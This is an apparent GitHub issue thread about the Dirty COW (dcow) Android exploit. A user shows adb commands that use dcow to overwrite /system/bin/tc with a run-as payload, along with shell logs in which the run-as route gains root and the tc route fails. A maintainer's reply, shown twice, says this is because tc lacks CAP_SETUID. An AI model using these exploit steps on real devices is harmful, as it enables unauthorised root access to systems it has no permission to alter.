timwr
commented
7 years ago @NDerek /system/bin/tc does not have CAP_SETUID run-as does. What are you trying to achieve?
Closed NDerek closed 7 years ago
timwr
commented
7 years ago @NDerek /system/bin/tc does not have CAP_SETUID run-as does. What are you trying to achieve?
@kirbyfan64 @droidvoider @toxeus ##thanks guys for your suggestions, they were helpful to me.
@Manouchehri @AnwarMohamed @toxeus @0x454447415244 @mikemaksymowych @droidvoider I got root shell when tried with original Makefile but when tried with the edited Makefile setresuid()/setresgid() failed
the EDIT was of only 2 line @ root: push adb shell 'chmod 777 /data/local/tmp/dcow' adb push libs/$(ARCH)/run-as /data/local/tmp/tc adb shell '/data/local/tmp/dcow /data/local/tmp/tc /system/bin/tc'
with this i was trying to do the same what we do as run-as but with tc binary file.
Everything goes well compiling, pushing, chmod, exploitation etc but when i tried
trying with edited Makefile:-
shell@android:/ $ id uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bwstats) shell@android:/ $ /system/bin/tc uid /system/bin/tc 2000 setresgid/setresuid failed_ uid 2000 no selinux? shell@android:/ $ id uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)
trying with original Makefile:-
shell@android:/ $ /system/bin/run-as uid /system/bin/run-as 2000 uid 0 no selinux? shell@android:/ # id uid=0(root) gid=0(root) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats shell@android:/ # exit shell@android:/ $ exit
So what's happening?? WHY setresuid()/setresgid() system calls failed to set r e s id when using tc in place of run-as in edited Makefile?